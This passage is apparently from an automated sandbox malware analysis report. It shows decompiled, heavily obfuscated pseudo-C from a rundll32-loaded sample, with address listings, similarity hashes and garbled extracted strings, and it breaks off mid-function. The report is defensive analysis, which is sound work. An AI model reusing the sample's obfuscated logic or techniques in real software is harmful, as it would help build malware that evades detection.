                                                                                                                      							_t784 = E003500A0(_t921, _t829, _t829, _v248, _v196, _t829, _v104, _a36,  *_t695, _v284, _v204, _v116, _v144, _a4);
                                                                                                                      							_t829 = _a24;
                                                                                                                      							_t923 =  &(_t923[0xd]);
                                                                                                                      							__eflags = _t784;
                                                                                                                      							_v236 = _t784;
                                                                                                                      							_t884 = 0x3d0a345;
                                                                                                                      							_t914 =  !=  ? 0x3d0a345 : 0x7ec14ff;
                                                                                                                      							goto L3;
                                                                                                                      						}
                                                                                                                      						if(_t914 == _t884) {
                                                                                                                      							__eflags =  *_t829;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t841 = _v24;
                                                                                                                      							} else {
                                                                                                                      								_push(_v132);
                                                                                                                      								_push(_v200);
                                                                                                                      								_push(0x3412fc);
                                                                                                                      								_t841 = E0034AB66(_v228, _v232, __eflags);
                                                                                                                      								_t923 =  &(_t923[3]);
                                                                                                                      								_v24 = _t841;
                                                                                                                      							}
                                                                                                                      							_t657 =  &_v100; // 0xe65150
                                                                                                                      							_t807 = _v40 | _v48 | _v60 | _v212 | _v124 | _v108 | _v216 | _v120 |  *_t657;
                                                                                                                      							_t919 = _v12 & 1;
                                                                                                                      							__eflags = _t919;
                                                                                                                      							if(_t919 != 0) {
                                                                                                                      								__eflags = _t807;
                                                                                                                      							}
                                                                                                                      							_push(_t841);
                                                                                                                      							_t808 = E00360349(_t841, _v240, _v16, _t841, _t841, _v192, _v272, _t807, _v236, _t841, _v52, _v160);
                                                                                                                      							_t913 = _t808;
                                                                                                                      							E0034AE03(_v36, _v92, _v128, _v24);
                                                                                                                      							_t923 =  &(_t923[0xd]);
                                                                                                                      							__eflags = _t808;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								goto L33;
                                                                                                                      							} else {
                                                                                                                      								_v68 = 1;
                                                                                                                      								E0034B6D1(_v44, _v264, _v184, 4, _v84,  &_v68, _t913);
                                                                                                                      								_t923 =  &(_t923[5]);
                                                                                                                      								__eflags = _t919;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									E003475A5(_t913, _v256, _v152, _v76, _v224,  &_v68,  &_v20);
                                                                                                                      									_t682 =  &_v68;
                                                                                                                      									 *_t682 = _v68 | _v28;
                                                                                                                      									__eflags =  *_t682;
                                                                                                                      									E0034B6D1(_v168, _v32, _v136, _v20, _v176,  &_v68, _t913);
                                                                                                                      									_t923 =  &(_t923[0xa]);
                                                                                                                      								}
                                                                                                                      								_t914 = 0x9d261fa;
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t914 == 0x703fe4d) {
                                                                                                                      							__eflags = E003484B8(_t913, _v220, __eflags) - _v180;
                                                                                                                      							_t914 =  ==  ? 0xb94cb2 : 0xe7d57af;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t914 != 0x7ec14ff) {
                                                                                                                      							goto L41;
                                                                                                                      						}
                                                                                                                      						E00360411(_t921, _v292, _v296, _v140);
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x00358270
                                                                                                                      0x00358271
                                                                                                                      0x00358278
                                                                                                                      0x00358283
                                                                                                                      0x00358290
                                                                                                                      0x00358294
                                                                                                                      0x00358299
                                                                                                                      0x0035829e
                                                                                                                      0x003582a6
                                                                                                                      0x003582ae
                                                                                                                      0x003582b6
                                                                                                                      0x003582be
                                                                                                                      0x003582c6
                                                                                                                      0x003582d1
                                                                                                                      0x003582d9
                                                                                                                      0x003582e4
                                                                                                                      0x003582ef
                                                                                                                      0x003582fc
                                                                                                                      0x00358300
                                                                                                                      0x00358308
                                                                                                                      0x00358310
                                                                                                                      0x00358318
                                                                                                                      0x00358320
                                                                                                                      0x00358328
                                                                                                                      0x0035832d
                                                                                                                      0x00358335
                                                                                                                      0x0035833d
                                                                                                                      0x00358345
                                                                                                                      0x0035834a
                                                                                                                      0x00358352
                                                                                                                      0x0035835a
                                                                                                                      0x0035836d
                                                                                                                      0x00358374
                                                                                                                      0x0035837c
                                                                                                                      0x00358387
                                                                                                                      0x0035838f
                                                                                                                      0x00358397
                                                                                                                      0x0035839f
                                                                                                                      0x003583a7
                                                                                                                      0x003583af
                                                                                                                      0x003583bc
                                                                                                                      0x003583c5
                                                                                                                      0x003583c9
                                                                                                                      0x003583d1
                                                                                                                      0x003583d9
                                                                                                                      0x003583e1
                                                                                                                      0x003583e9
                                                                                                                      0x003583f1
                                                                                                                      0x003583f9
                                                                                                                      0x00358404
                                                                                                                      0x0035840c
                                                                                                                      0x00358417
                                                                                                                      0x00358422
                                                                                                                      0x00358435
                                                                                                                      0x0035843c
                                                                                                                      0x00358447
                                                                                                                      0x00358452
                                                                                                                      0x0035845a
                                                                                                                      0x00358465
                                                                                                                      0x00358470
                                                                                                                      0x0035847b
                                                                                                                      0x00358486
                                                                                                                      0x00358499
                                                                                                                      0x003584a0
                                                                                                                      0x003584a8
                                                                                                                      0x003584b3
                                                                                                                      0x003584c1
                                                                                                                      0x003584ce
                                                                                                                      0x003584d1
                                                                                                                      0x003584da
                                                                                                                      0x003584de
                                                                                                                      0x003584e6
                                                                                                                      0x003584fc
                                                                                                                      0x0035850b
                                                                                                                      0x0035850e
                                                                                                                      0x00358515
                                                                                                                      0x00358520
                                                                                                                      0x00358536
                                                                                                                      0x0035853d
                                                                                                                      0x00358548
                                                                                                                      0x00358550
                                                                                                                      0x0035855c
                                                                                                                      0x00358561
                                                                                                                      0x00358567
                                                                                                                      0x0035856c
                                                                                                                      0x00358574
                                                                                                                      0x0035857f
                                                                                                                      0x0035858a
                                                                                                                      0x00358595
                                                                                                                      0x003585a2
                                                                                                                      0x003585a3
                                                                                                                      0x003585a7
                                                                                                                      0x003585ac
                                                                                                                      0x003585b4
                                                                                                                      0x003585bc
                                                                                                                      0x003585c7
                                                                                                                      0x003585d2
                                                                                                                      0x003585dd
                                                                                                                      0x003585e8
                                                                                                                      0x003585fb
                                                                                                                      0x00358602
                                                                                                                      0x0035860d
                                                                                                                      0x00358618
                                                                                                                      0x00358623
                                                                                                                      0x0035862b
                                                                                                                      0x00358636
                                                                                                                      0x00358641
                                                                                                                      0x0035864c
                                                                                                                      0x00358657
                                                                                                                      0x0035865f
                                                                                                                      0x00358667
                                                                                                                      0x00358675
                                                                                                                      0x00358679
                                                                                                                      0x00358681
                                                                                                                      0x00358689
                                                                                                                      0x00358691
                                                                                                                      0x00358699
                                                                                                                      0x003586a1
                                                                                                                      0x003586a9
                                                                                                                      0x003586b6
                                                                                                                      0x003586ba
                                                                                                                      0x003586bf
                                                                                                                      0x003586c4
                                                                                                                      0x003586cc
                                                                                                                      0x003586d4
                                                                                                                      0x003586dc
                                                                                                                      0x003586e9
                                                                                                                      0x003586ec
                                                                                                                      0x003586f0
                                                                                                                      0x003586f8
                                                                                                                      0x00358705
                                                                                                                      0x00358709
                                                                                                                      0x00358711
                                                                                                                      0x00358719
                                                                                                                      0x00358724
                                                                                                                      0x0035872f
                                                                                                                      0x0035873a
                                                                                                                      0x00358745
                                                                                                                      0x0035874c
                                                                                                                      0x00358754
                                                                                                                      0x0035875f
                                                                                                                      0x0035876a
                                                                                                                      0x0035877d
                                                                                                                      0x00358784
                                                                                                                      0x0035878f
                                                                                                                      0x00358797
                                                                                                                      0x0035879c
                                                                                                                      0x003587a4
                                                                                                                      0x003587ac
                                                                                                                      0x003587b6
                                                                                                                      0x003587ba
                                                                                                                      0x003587c2
                                                                                                                      0x003587ca
                                                                                                                      0x003587d2
                                                                                                                      0x003587d7
                                                                                                                      0x003587df
                                                                                                                      0x003587e7
                                                                                                                      0x003587f2
                                                                                                                      0x003587fa
                                                                                                                      0x00358805
                                                                                                                      0x00358810
                                                                                                                      0x00358817
                                                                                                                      0x0035881e
                                                                                                                      0x0035881e
                                                                                                                      0x00358823
                                                                                                                      0x00358823
                                                                                                                      0x00358827
                                                                                                                      0x00358827
                                                                                                                      0x00358827
                                                                                                                      0x0035882d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00358ae9
                                                                                                                      0x00358aef
                                                                                                                      0x00358c0c
                                                                                                                      0x00358c13
                                                                                                                      0x00358c18
                                                                                                                      0x00358c18
                                                                                                                      0x00358c1f
                                                                                                                      0x00358c24
                                                                                                                      0x00358c24
                                                                                                                      0x00358c2a
                                                                                                                      0x00358886
                                                                                                                      0x0035888f
                                                                                                                      0x0035888f
                                                                                                                      0x00358823
                                                                                                                      0x00000000
                                                                                                                      0x00358823
                                                                                                                      0x00358af5
                                                                                                                      0x00358afb
                                                                                                                      0x00358baa
                                                                                                                      0x00358bac
                                                                                                                      0x00358bae
                                                                                                                      0x00358bbc
                                                                                                                      0x00358bbc
                                                                                                                      0x00358bb0
                                                                                                                      0x00358bb7
                                                                                                                      0x00358bb7
                                                                                                                      0x00358bdb
                                                                                                                      0x00358be0
                                                                                                                      0x00358be5
                                                                                                                      0x00358bed
                                                                                                                      0x003588b3
                                                                                                                      0x003588b3
                                                                                                                      0x00000000
                                                                                                                      0x003588b3
                                                                                                                      0x00358b01
                                                                                                                      0x00358b07
                                                                                                                      0x00358b4c
                                                                                                                      0x00358b6c
                                                                                                                      0x00358b7a
                                                                                                                      0x00358b8f
                                                                                                                      0x00358b9d
                                                                                                                      0x00358ba0
                                                                                                                      0x00358ba5
                                                                                                                      0x00000000
                                                                                                                      0x00358ba5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *f$ XU$"f$'g2$'g2$*^b$+81$D4iPQ$Jb$M#_8$PQ$[n0D4iPQ$a+$lu$pg[$vNj$wrz$r/$?n
                                                                                                                      • API String ID: 0-930466666
                                                                                                                      • Opcode ID: a2ed38ef2d75d4ee545021783f675fee2768572c953ce81da1e73a0a3075b748
                                                                                                                      • Instruction ID: 3a7de2fdbca1f13ee96e5402d16a5bf3b8751723ae44ea49fb58a758c751af3c
                                                                                                                      • Opcode Fuzzy Hash: a2ed38ef2d75d4ee545021783f675fee2768572c953ce81da1e73a0a3075b748
                                                                                                                      • Instruction Fuzzy Hash: AF82FFB15093818FD3B9CF25C54AA8BBBE1FBC4708F10891DE5DA9A260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0034CFCE(intOrPtr __ecx) {
                                                                                                                      				char _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				char* _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				char _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				char _v76;
                                                                                                                      				char _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				unsigned int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				void* _t878;
                                                                                                                      				intOrPtr _t883;
                                                                                                                      				intOrPtr _t885;
                                                                                                                      				void* _t887;
                                                                                                                      				void* _t891;
                                                                                                                      				void* _t897;
                                                                                                                      				intOrPtr _t905;
                                                                                                                      				intOrPtr _t911;
                                                                                                                      				intOrPtr _t912;
                                                                                                                      				void* _t913;
                                                                                                                      				signed int _t915;
                                                                                                                      				char _t918;
                                                                                                                      				void* _t927;
                                                                                                                      				signed int _t933;
                                                                                                                      				signed int _t934;
                                                                                                                      				signed int _t935;
                                                                                                                      				signed int _t936;
                                                                                                                      				signed int _t937;
                                                                                                                      				signed int _t938;
                                                                                                                      				signed int _t939;
                                                                                                                      				signed int _t940;
                                                                                                                      				signed int _t941;
                                                                                                                      				signed int _t942;
                                                                                                                      				signed int _t943;
                                                                                                                      				signed int _t944;
                                                                                                                      				signed int _t945;
                                                                                                                      				signed int _t946;
                                                                                                                      				signed int _t947;
                                                                                                                      				signed int _t948;
                                                                                                                      				signed int _t949;
                                                                                                                      				void* _t950;
                                                                                                                      				intOrPtr _t967;
                                                                                                                      				intOrPtr _t971;
                                                                                                                      				void* _t1030;
                                                                                                                      				intOrPtr _t1032;
                                                                                                                      				intOrPtr _t1036;
                                                                                                                      				signed int _t1052;
                                                                                                                      				void* _t1053;
                                                                                                                      				intOrPtr _t1055;
                                                                                                                      				signed int _t1056;
                                                                                                                      				signed int _t1057;
                                                                                                                      				void* _t1058;
                                                                                                                      				void* _t1063;
                                                                                                                      				signed int* _t1065;
                                                                                                                      				void* _t1070;
                                                                                                                      
                                                                                                                      				_t1065 =  &_v428;
                                                                                                                      				_v368 = 0xff2aef;
                                                                                                                      				_v368 = _v368 ^ 0x94d7aa8a;
                                                                                                                      				_v72 = __ecx;
                                                                                                                      				_t1063 = 0;
                                                                                                                      				_t933 = 0x71;
                                                                                                                      				_v368 = _v368 / _t933;
                                                                                                                      				_v368 = _v368 >> 0x10;
                                                                                                                      				_t927 = 0xe23336a;
                                                                                                                      				_v368 = _v368 ^ 0x4d424504;
                                                                                                                      				_v360 = 0xd1872;
                                                                                                                      				_v360 = _v360 >> 1;
                                                                                                                      				_v360 = _v360 ^ 0xf196af6a;
                                                                                                                      				_v360 = _v360 >> 2;
                                                                                                                      				_v360 = _v360 ^ 0x3c6408d5;
                                                                                                                      				_v176 = 0xb206d0;
                                                                                                                      				_t934 = 0x55;
                                                                                                                      				_v176 = _v176 * 0x7f;
                                                                                                                      				_v176 = _v176 ^ 0x58516130;
                                                                                                                      				_v128 = 0x74c3bb;
                                                                                                                      				_v128 = _v128 ^ 0x08cc5173;
                                                                                                                      				_v128 = _v128 ^ 0x08b892c8;
                                                                                                                      				_v324 = 0x9db377;
                                                                                                                      				_t935 = 0x54;
                                                                                                                      				_v324 = _v324 / _t934;
                                                                                                                      				_v324 = _v324 >> 9;
                                                                                                                      				_v324 = _v324 ^ 0x000000ed;
                                                                                                                      				_v112 = 0x5e8d48;
                                                                                                                      				_v112 = _v112 / _t935;
                                                                                                                      				_v112 = _v112 ^ 0x00012028;
                                                                                                                      				_v224 = 0x5fd119;
                                                                                                                      				_v224 = _v224 | 0x5d78ffc1;
                                                                                                                      				_v224 = _v224 ^ 0x83601dcb;
                                                                                                                      				_v224 = _v224 ^ 0xde1fe212;
                                                                                                                      				_v284 = 0x3ef093;
                                                                                                                      				_t1056 = 0x2f;
                                                                                                                      				_v284 = _v284 * 0x78;
                                                                                                                      				_v284 = _v284 ^ 0x8f55145b;
                                                                                                                      				_v284 = _v284 ^ 0x92d5d0b3;
                                                                                                                      				_v384 = 0xed432;
                                                                                                                      				_v384 = _v384 << 5;
                                                                                                                      				_v384 = _v384 | 0x363f046e;
                                                                                                                      				_v384 = _v384 + 0xffff62d1;
                                                                                                                      				_v384 = _v384 ^ 0x37fee93f;
                                                                                                                      				_v140 = 0x433cbb;
                                                                                                                      				_v140 = _v140 + 0xffffaad9;
                                                                                                                      				_v140 = _v140 ^ 0x0042e794;
                                                                                                                      				_v336 = 0xcb983b;
                                                                                                                      				_v336 = _v336 >> 1;
                                                                                                                      				_v336 = _v336 << 4;
                                                                                                                      				_v336 = _v336 | 0x18349d49;
                                                                                                                      				_v336 = _v336 ^ 0x1e7cddd9;
                                                                                                                      				_v116 = 0xdf1b2;
                                                                                                                      				_v116 = _v116 | 0x5d84461c;
                                                                                                                      				_v116 = _v116 ^ 0x5d8df7be;
                                                                                                                      				_v352 = 0x1a6928;
                                                                                                                      				_v352 = _v352 + 0xb4e6;
                                                                                                                      				_v352 = _v352 + 0xd244;
                                                                                                                      				_v352 = _v352 + 0xffffe4cf;
                                                                                                                      				_v352 = _v352 ^ 0x001bd501;
                                                                                                                      				_v216 = 0x4eea53;
                                                                                                                      				_v216 = _v216 / _t1056;
                                                                                                                      				_v216 = _v216 + 0xffff2d58;
                                                                                                                      				_v216 = _v216 ^ 0x000cf508;
                                                                                                                      				_v136 = 0xd4127c;
                                                                                                                      				_t936 = 0xd;
                                                                                                                      				_v136 = _v136 * 0x71;
                                                                                                                      				_v136 = _v136 ^ 0x5d98049d;
                                                                                                                      				_v84 = 0x5dec0;
                                                                                                                      				_v84 = _v84 + 0xffff1ffb;
                                                                                                                      				_v84 = _v84 ^ 0x00030d01;
                                                                                                                      				_v144 = 0x51c367;
                                                                                                                      				_v144 = _v144 | 0x0242a62f;
                                                                                                                      				_v144 = _v144 ^ 0x025bd945;
                                                                                                                      				_v232 = 0x88ff65;
                                                                                                                      				_v232 = _v232 >> 3;
                                                                                                                      				_v232 = _v232 ^ 0xa25d5547;
                                                                                                                      				_v232 = _v232 ^ 0xa24a7ec6;
                                                                                                                      				_v272 = 0xc81b6f;
                                                                                                                      				_v272 = _v272 | 0x487ad3f8;
                                                                                                                      				_v272 = _v272 ^ 0xba29c57d;
                                                                                                                      				_v272 = _v272 ^ 0xf2d9b36a;
                                                                                                                      				_v348 = 0xc83c7a;
                                                                                                                      				_v348 = _v348 ^ 0xff1a377f;
                                                                                                                      				_v348 = _v348 << 6;
                                                                                                                      				_v348 = _v348 ^ 0x4baa6a66;
                                                                                                                      				_v348 = _v348 ^ 0xbf2398db;
                                                                                                                      				_v388 = 0x1aaad9;
                                                                                                                      				_v388 = _v388 >> 0xf;
                                                                                                                      				_v388 = _v388 * 0x2b;
                                                                                                                      				_v388 = _v388 | 0xe773ca21;
                                                                                                                      				_v388 = _v388 ^ 0xe773499c;
                                                                                                                      				_v200 = 0x8f1511;
                                                                                                                      				_v200 = _v200 + 0x4dd0;
                                                                                                                      				_v200 = _v200 ^ 0xe54041ed;
                                                                                                                      				_v200 = _v200 ^ 0xe5c111e7;
                                                                                                                      				_v264 = 0x8d8e04;
                                                                                                                      				_v264 = _v264 / _t936;
                                                                                                                      				_t937 = 0x4c;
                                                                                                                      				_v264 = _v264 * 0x55;
                                                                                                                      				_v264 = _v264 ^ 0x039811bf;
                                                                                                                      				_v96 = 0xdcd85e;
                                                                                                                      				_v96 = _v96 / _t937;
                                                                                                                      				_v96 = _v96 ^ 0x000f7a5c;
                                                                                                                      				_v428 = 0x18f383;
                                                                                                                      				_v428 = _v428 + 0xffff3777;
                                                                                                                      				_v428 = _v428 >> 1;
                                                                                                                      				_v428 = _v428 + 0xf3dd;
                                                                                                                      				_v428 = _v428 ^ 0x000e7633;
                                                                                                                      				_v188 = 0x34b02;
                                                                                                                      				_v188 = _v188 ^ 0xe768d075;
                                                                                                                      				_v188 = _v188 ^ 0xe766fcd1;
                                                                                                                      				_v88 = 0xb2b6ec;
                                                                                                                      				_v88 = _v88 | 0xb32e283a;
                                                                                                                      				_v88 = _v88 ^ 0xb3b69210;
                                                                                                                      				_v424 = 0x403e2a;
                                                                                                                      				_v424 = _v424 ^ 0x11634d1e;
                                                                                                                      				_v424 = _v424 | 0x9df6a7b5;
                                                                                                                      				_v424 = _v424 >> 2;
                                                                                                                      				_v424 = _v424 ^ 0x2776b69a;
                                                                                                                      				_v180 = 0x23f4a5;
                                                                                                                      				_v180 = _v180 << 7;
                                                                                                                      				_v180 = _v180 ^ 0x11fd1649;
                                                                                                                      				_v316 = 0xb84933;
                                                                                                                      				_v316 = _v316 | 0x4a16bd06;
                                                                                                                      				_v316 = _v316 << 1;
                                                                                                                      				_v316 = _v316 ^ 0x95764bca;
                                                                                                                      				_v420 = 0xe425a2;
                                                                                                                      				_v420 = _v420 << 7;
                                                                                                                      				_v420 = _v420 << 1;
                                                                                                                      				_v420 = _v420 >> 6;
                                                                                                                      				_v420 = _v420 ^ 0x039eaa37;
                                                                                                                      				_v292 = 0x9acd8a;
                                                                                                                      				_v292 = _v292 ^ 0x0e2fa243;
                                                                                                                      				_t1052 = 0x17;
                                                                                                                      				_v292 = _v292 / _t1052;
                                                                                                                      				_v292 = _v292 ^ 0x00a605f7;
                                                                                                                      				_v380 = 0x2df23b;
                                                                                                                      				_t938 = 0x6d;
                                                                                                                      				_v380 = _v380 * 0x74;
                                                                                                                      				_v380 = _v380 >> 0xc;
                                                                                                                      				_v380 = _v380 / _t938;
                                                                                                                      				_v380 = _v380 ^ 0x0002d8a7;
                                                                                                                      				_v192 = 0x38a983;
                                                                                                                      				_v192 = _v192 ^ 0x7338200d;
                                                                                                                      				_v192 = _v192 ^ 0x730638fe;
                                                                                                                      				_v356 = 0xf20a05;
                                                                                                                      				_v356 = _v356 + 0xff6b;
                                                                                                                      				_v356 = _v356 + 0x3cb0;
                                                                                                                      				_v356 = _v356 + 0xc3cc;
                                                                                                                      				_v356 = _v356 ^ 0x00f609fa;
                                                                                                                      				_v196 = 0x1d0726;
                                                                                                                      				_t939 = 0x1a;
                                                                                                                      				_v196 = _v196 / _t939;
                                                                                                                      				_v196 = _v196 + 0xb645;
                                                                                                                      				_v196 = _v196 ^ 0x000fece0;
                                                                                                                      				_v120 = 0xd811b7;
                                                                                                                      				_t940 = 0x3d;
                                                                                                                      				_v120 = _v120 / _t940;
                                                                                                                      				_v120 = _v120 ^ 0x0001bcc6;
                                                                                                                      				_v184 = 0xffd473;
                                                                                                                      				_v184 = _v184 | 0x4373bb07;
                                                                                                                      				_v184 = _v184 ^ 0x43f83aa1;
                                                                                                                      				_v372 = 0x3a762e;
                                                                                                                      				_v372 = _v372 + 0x1c4d;
                                                                                                                      				_t941 = 0x56;
                                                                                                                      				_v372 = _v372 * 0x6d;
                                                                                                                      				_v372 = _v372 << 4;
                                                                                                                      				_v372 = _v372 ^ 0x8f067f53;
                                                                                                                      				_v168 = 0xcae3b4;
                                                                                                                      				_v168 = _v168 | 0xbfa03ec2;
                                                                                                                      				_v168 = _v168 ^ 0xbfe1c53a;
                                                                                                                      				_v100 = 0xf6f3e0;
                                                                                                                      				_v100 = _v100 >> 3;
                                                                                                                      				_v100 = _v100 ^ 0x0013143a;
                                                                                                                      				_v412 = 0x1e0966;
                                                                                                                      				_v412 = _v412 >> 4;
                                                                                                                      				_v412 = _v412 + 0xffffee60;
                                                                                                                      				_v412 = _v412 | 0x230cd4d2;
                                                                                                                      				_v412 = _v412 ^ 0x230304c3;
                                                                                                                      				_v404 = 0x998131;
                                                                                                                      				_v404 = _v404 << 7;
                                                                                                                      				_v404 = _v404 | 0x77ffce0e;
                                                                                                                      				_v404 = _v404 ^ 0x7ff99efa;
                                                                                                                      				_v312 = 0x568591;
                                                                                                                      				_v312 = _v312 >> 0xf;
                                                                                                                      				_v312 = _v312 / _t941;
                                                                                                                      				_v312 = _v312 ^ 0x000b9c1e;
                                                                                                                      				_v160 = 0xbcadf8;
                                                                                                                      				_v160 = _v160 >> 1;
                                                                                                                      				_v160 = _v160 ^ 0x00564666;
                                                                                                                      				_v256 = 0x89dc62;
                                                                                                                      				_v256 = _v256 + 0xffff4163;
                                                                                                                      				_t942 = 0x31;
                                                                                                                      				_v256 = _v256 / _t942;
                                                                                                                      				_v256 = _v256 ^ 0x000723b0;
                                                                                                                      				_v320 = 0x8b7373;
                                                                                                                      				_v320 = _v320 ^ 0x53082765;
                                                                                                                      				_v320 = _v320 + 0xffaf;
                                                                                                                      				_v320 = _v320 ^ 0x53885e4a;
                                                                                                                      				_v92 = 0x6fe7c3;
                                                                                                                      				_v92 = _v92 / _t1056;
                                                                                                                      				_v92 = _v92 ^ 0x00052277;
                                                                                                                      				_v304 = 0xc66521;
                                                                                                                      				_v304 = _v304 + 0xffff290f;
                                                                                                                      				_v304 = _v304 + 0xffff5c28;
                                                                                                                      				_v304 = _v304 ^ 0x00cc2568;
                                                                                                                      				_v340 = 0x1cea4a;
                                                                                                                      				_v340 = _v340 >> 0xc;
                                                                                                                      				_t943 = 0x23;
                                                                                                                      				_v340 = _v340 * 0x60;
                                                                                                                      				_v340 = _v340 ^ 0x014bf5b0;
                                                                                                                      				_v340 = _v340 ^ 0x014272a9;
                                                                                                                      				_v152 = 0xc6e163;
                                                                                                                      				_v152 = _v152 + 0x3602;
                                                                                                                      				_v152 = _v152 ^ 0x00cdf824;
                                                                                                                      				_v296 = 0x3aa8f0;
                                                                                                                      				_v296 = _v296 + 0xffff263e;
                                                                                                                      				_v296 = _v296 / _t943;
                                                                                                                      				_v296 = _v296 ^ 0x0003475b;
                                                                                                                      				_v248 = 0xb8b108;
                                                                                                                      				_v248 = _v248 + 0xab20;
                                                                                                                      				_t944 = 0x75;
                                                                                                                      				_v248 = _v248 / _t944;
                                                                                                                      				_v248 = _v248 ^ 0x00035626;
                                                                                                                      				_v300 = 0xbacf;
                                                                                                                      				_v300 = _v300 >> 5;
                                                                                                                      				_v300 = _v300 / _t1052;
                                                                                                                      				_v300 = _v300 ^ 0x000b4ef1;
                                                                                                                      				_v172 = 0xfe2c89;
                                                                                                                      				_v172 = _v172 * 0x65;
                                                                                                                      				_v172 = _v172 ^ 0x6444a0c5;
                                                                                                                      				_v416 = 0xe4629;
                                                                                                                      				_v416 = _v416 << 1;
                                                                                                                      				_v416 = _v416 >> 0xf;
                                                                                                                      				_v416 = _v416 >> 8;
                                                                                                                      				_v416 = _v416 ^ 0x000284ee;
                                                                                                                      				_v308 = 0x20a4b4;
                                                                                                                      				_v308 = _v308 | 0x84e389a9;
                                                                                                                      				_v308 = _v308 * 0x13;
                                                                                                                      				_v308 = _v308 ^ 0xdce9fc24;
                                                                                                                      				_v276 = 0x7369a;
                                                                                                                      				_v276 = _v276 * 0x43;
                                                                                                                      				_v276 = _v276 << 9;
                                                                                                                      				_v276 = _v276 ^ 0xc69e4921;
                                                                                                                      				_v392 = 0xdfb120;
                                                                                                                      				_t1057 = 0x30;
                                                                                                                      				_v392 = _v392 / _t1057;
                                                                                                                      				_v392 = _v392 | 0xaf971ec4;
                                                                                                                      				_v392 = _v392 + 0xad3b;
                                                                                                                      				_v392 = _v392 ^ 0xaf95a150;
                                                                                                                      				_v400 = 0xf5e732;
                                                                                                                      				_v400 = _v400 << 0xd;
                                                                                                                      				_v400 = _v400 ^ 0x49123968;
                                                                                                                      				_v400 = _v400 << 0xa;
                                                                                                                      				_v400 = _v400 ^ 0xd1e13951;
                                                                                                                      				_v408 = 0xd34aa1;
                                                                                                                      				_v408 = _v408 | 0x4ccc3e1e;
                                                                                                                      				_t945 = 0x64;
                                                                                                                      				_v408 = _v408 * 0x42;
                                                                                                                      				_v408 = _v408 / _t945;
                                                                                                                      				_v408 = _v408 ^ 0x02168dd3;
                                                                                                                      				_v332 = 0xf683c0;
                                                                                                                      				_v332 = _v332 / _t1052;
